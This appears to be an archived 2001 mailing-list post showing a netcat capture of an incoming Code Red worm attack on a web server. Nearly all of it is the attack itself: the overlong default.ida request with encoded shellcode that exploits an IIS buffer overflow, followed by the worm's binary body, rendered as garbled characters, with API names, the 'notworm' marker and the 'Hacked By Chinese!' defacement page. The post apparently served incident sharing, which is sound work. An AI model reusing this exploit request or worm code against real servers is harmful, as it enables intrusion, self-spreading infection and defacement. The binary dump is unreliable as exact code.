Well it probably started.
Timestamp 17:02:55 GMT
HEX Dump attached
--------------------------------------------
C:\>nc -l -p 80 -o ida1.txt -vvv
listening on [any] 80 ...
connect to [195.242.154.8] from h56n2fls32o971.telia.com [217.208.81.56]
64857
GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%
u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569
UΜΉΒΉ↑☻ SVWΞ╜ϋ² ¦Η ╕¦¦¦¦≤τ╟Ζp¦ ώ
♂ ΠΖh¦ Ξ╜Ώ¦ dκ ΚdΚ= ώo
ΠΖ`¦ ╟ΖΏ¦ ΜΖh¦ ΔϋΚΖΪ¦ ╟ΖX¦ ωwϋδ
Δ╜p¦ ☼Ζ▌☺ ΜΞX¦ Β┴ ☺ ΚΞX¦ Β╜X¦ xu
╟ΖX¦ Ώ¬ΜΧX¦ 3└fΜ☻=MZ ☼Ζγ☺ ΜΞX¦ ΜQ<ΜΖX¦ 3╔fΜ♀►Β∙PE ☼Ζy☺
ΜΧX¦ ΜB<ΜΞX¦
ΜT☺x¦ΧX¦ ΚΧT¦ ΜΖT¦ ΜH♀¦ΞX¦ ΚΞL¦ ΜΧL¦ Β:KERN☼Ζ3☺ ΜΖL¦ Βx¦EL32☼Ζ ☺
ΜΞX¦
ΚΞ4¦ ΜΧT¦ ΜΖX¦ ¦B ΚΖL¦ ╟ΖH¦
Έ▲ΜΞH¦ Δ┴☺ΚΞH¦ ΜΧL¦ Δ┬¦ΚΧL¦ ΜΖT¦ ΜΞH¦
;H↑☼Ξ└ ΜΧL¦ Μ☻ΜΞX¦ Β<☺GetP☼Ζι ΜΧL¦ Μ☻ΜΞX¦ Β|☺¦rocA☼ΖΕ
ΜΧH¦ ¦ΧH¦ ¦ΧX
¦ ΜΖT¦ ΜH$3└fΜ¦
ΚΖL¦ ΜΞT¦ ΜQ►ΜΖL¦ ΞL► ΚΞL¦ ΜΧL¦ ¦ΧL¦ ¦ΧL¦ ¦ΧL¦ ¦ΧX¦ ΜΖT¦ ΜH∟Μ¶
ώ▬¦ Ξ╜Ώ¦ Μdμ Δ╜p¦ u¦ώ ╟ΖL¦ ☺ Έ☼ΜΞL¦ Δ┴☺ΚΞL¦ ΜΧh¦ ☼╛☻Ζ└☼ΕΞ
ΜΞh
¦ ☼╛◄Δ·
u!ΜΖh¦ Δ└☺ΜΪP ΧΡ¦ ;ΪΡCKCKΚΖ4¦ Έ*ΜΪΜΞh¦ QΜΧ4¦ R Χp¦ ;ΪΡCKCK
ΜΞL¦ ΚΕΞΝ¦ Έ☼ΜΧh¦ Δ┬☺ΚΧh¦ ΜΖh¦ ☼Ζ╔t☻ΈέΜΧh¦ Δ┬☺ΚΧh¦ ώS ΜΖh¦ Δ└☺ΚΖh¦
ΜM
ΜΣΕ ΚΧl¦ ╟ΖL¦ ¦ ╞Ζ╨¦ hΜΚΖ╤¦ ╟Ζ╒¦ [SS ╟Ζ┘¦ cxΡΡΜΜQ►ΚΧP¦ Δ╜P¦
u&ΜΪj Ξ
ΖL¦ PΜΞh¦ QΜΜP Χl¦ ;ΪΡCKCKΔ╜P¦ d}\ΜΞP¦ Δ┴☺ΚΞP¦ ΜΧP¦ i╥ΞfΏPΚΧt¦ ΜΜΞP¦
ΚH
►ΜΪΞΧ,¦ Rj ΞΖL¦ PΞΞ╨¦ Qj j Χα¦ ;ΪΡCKCKώθ☺
ΜΪ Χν¦ ;ΪΡCKCKΚΖL¦ ΜΧL¦ Βέ
ΚΧL¦ Β╜L¦ ¦ t¦ώg☺ ΜΪh ▌m Χι¦ ;ΪΡCKCKώΑ¦
ΠΖL¦ ΜΖ4¦ ΚΖ¦¦ ΜΞL¦ ΜΧ░¦
Κ◄ΜΖL¦ ΜΞ╚¦ ΚH¦ΜΧh¦ ΚΧP¦ Έ☼ΜΖP¦ Δ└☺ΚΖP¦ ΜΞh¦ Β┴ ☺
9ΞP¦ s¦ΜΧP¦ Β:LMTHu
☻Έ☻Έ╦ΜΖP¦ Δ└¦ΜΞL¦ ΚΜΪΞΧH¦ Rj¦h @ ΜΖ¦¦ P Χρ¦ ;ΪΡCKCK╟ΖL¦
Έ☼ΜΞL¦ Δ┴☺ΚΞ
L¦ Β╜L¦ 0 }VΜΧ¦¦ ¦ΧL¦ Μ☻;Ζ░¦ u>ΜΞ¦¦ ¦ΞL¦ ΜΧ`¦ Κ◄ΜΪh
Q%☻ Χι¦ ;ΪΡCKCKΜΖ
¦¦ ¦ΖL¦ ΜΞ░¦ Έ☻ΈΠΜΪΞΧL¦ RΜΖH¦ Ph @ ΜΞ¦¦ Q Χρ¦ ;ΪΡCKCK¦☺ Ζ╥☼Εύ¦
ΜΪj hΑ
j¦j j☺h ΑΜΖh¦ Δ└cP Χε¦ ;ΪΡCKCKΚΖ0¦ Δ╜0¦ t΅¦☺
Ζ╔t▬ΜΪh ¦ Χι¦ ;ΪΡCKC
KΈάΜΪΞΧ8¦ R ΧΦ¦ ;ΪΡCKCKΜΖ>¦ ΚΖL¦ ΜΞL¦ Βά ΚΞL¦ Δ╜L¦ ¶☼ΝG☺ ¦☺
Ζ╥☼Ε:☺
ΜΪΞΖ8¦ P ΧΦ¦ ;ΪΡCKCKΜΞ>¦ ΚΞL¦ ΜΧL¦ Βέ ΚΧL¦ Δ╜L¦ ∟|΅╕☺
Ζ└t▬ΜΪh ¦ Χ
ι¦ ;ΪΡCKCKΈάΜΪjd Χι¦ ;ΪΡCKCKΜΪj j☺j☻ Χ╕¦ ;ΪΡCKCKΚΖx¦ f╟Ζ|¦ ☻ f╟Ζ~¦
P╟ΖΑ¦
╞ΚΏ[ΜΪj►ΞΞ|¦ QΜΧx¦ R Χ╝¦ ;ΪΡCKCK╟ΖL¦ Έ☼ΜΖL¦ Δ└☺ΚΖL¦ Β╜L¦ Α☺
}7ΜΪhϋ¦
Χι¦ ;ΪΡCKCKΜΪj j☺ΞΞⁿ¦ QΜΧx¦ R Χ└¦ ;ΪΡCKCKΈχΜΪh
☺ Χι¦ ;ΪΡCKCKώ¦¦ ΜΖD¦
ΚΖP¦ ΜΞP¦ ☼ψΞP¦ i╔ήY═ ΜΧP¦ i╥¦ά☺ ΜΖt¦ ¦┴¦╨ΚΧt¦ ΜΞt¦ i╔Δ3╧
Β┴S¦kΚΞt¦ ΜΧt
☻ ΚΖt¦ ΜΪjd Χι¦ ;ΪΡCKCKΜΪj j☺j☻ Χ╕¦ ;ΪΡCKCKΚΖx¦ f╟Ζ|¦ ☻ f╟Ζ~¦
PΜΞt¦ ΚΞΑ¦
ΜΪj►ΞΧ|¦ RΜΖx¦ P Χ╝¦ ;ΪΡCKCKΖ└☼ΖΎ☺ ΜΪj
j¦ΜΞh¦ QΜΧx¦ R Χ└¦ ;ΪΡCKCK╟ΖL¦
ΜΜHhΚΞd¦ Έ▲ΜΧd¦ Δ┬☺ΚΧd¦ ΜΖL¦ Δ└☺ΚΖL¦ ΜΞd¦ ☼╛◄Ζ╥t☻Έ╙ΜΪj
ΜΖL¦ PΜΜQhRΜΖx
¦ P Χ└¦ ;ΪΡCKCKΜΪj j☺ΜΞh¦ Δ┴¦QΜΧx¦ R Χ└¦ ;ΪΡCKCK╟ΖL¦
ΜHdΚΞd¦ Έ▲ΜΧd¦
Δ┬☺ΚΧd¦ ΜΖL¦ Δ└☺ΚΖL¦ ΜΞd¦ ☼╛◄Ζ╥t☻Έ╙ΜΪj
ΜΖL¦ PΜΜQdRΜΖx¦ P Χ└¦ ;ΪΡCKCK╟ΖL¦
ΜΞh¦ Δ┴ΚΞd¦ Έ▲ΜΧd¦ Δ┬☺ΚΧd¦ ΜΖL¦ Δ└☺ΚΖL¦ ΜΞd¦ ☼╛◄Ζ╥t☻Έ╙ΜΪj
ΜΖL¦ PΜΞh
¦ Δ┴QΜΧx¦ R Χ└¦ ;ΪΡCKCKΜΜHpΚΞL¦ ΜΪj
ΜΧL¦ RΜΜHxQΜΧx¦ R Χ└¦ ;ΪΡCKCK╞Ζⁿ¦ Μ
Ϊj h ☺
ΞΖⁿ¦ PΜΞx¦ Q Χ─¦ ;ΪΡCKCKΚΖL¦ ΜΪΜΧx¦ R Χ╚¦ ;ΪΡCKCKώ♀√ Έ¦ϋΝΫ Έ0XΔ└
¦UWSVPj<ΜΏΔ╞♀Vh ☺ t$( ►XP t$↑ P¦X^[_] Ρϋ╦ ϋ{∙ ,7(nΕ2¦uΈ¦A
V4¦╕xV4¦╕xV4¦XPΜ
╜h¦ ΚG≥├ΜD$♀¦╕ ╟ ┌¦╢ 3└├ΈΉϋ±Ϊ LoadLibraryA GetSystemTime CreateThread
Create
FileA Sleep GetSystemDefaultLangID VirtualProtect infocomm.dll
TcpSockSend
WS2_32.dll socket connect send recv closesocket w3svc.dll
GET
? HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569
c:\notworm LMTH
<html><head><meta http-equiv="Content-Type" content="text/html;
charset=english"
><title>HELLO!</title></head><bady><hr size=5><font color="red"><p
align="center
">Welcome to http://www.worm.com !<br><br>Hacked By
Chinese!</font></hr></bady><
/html>
sent 1, rcvd 4039
This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 10:24:52 PDT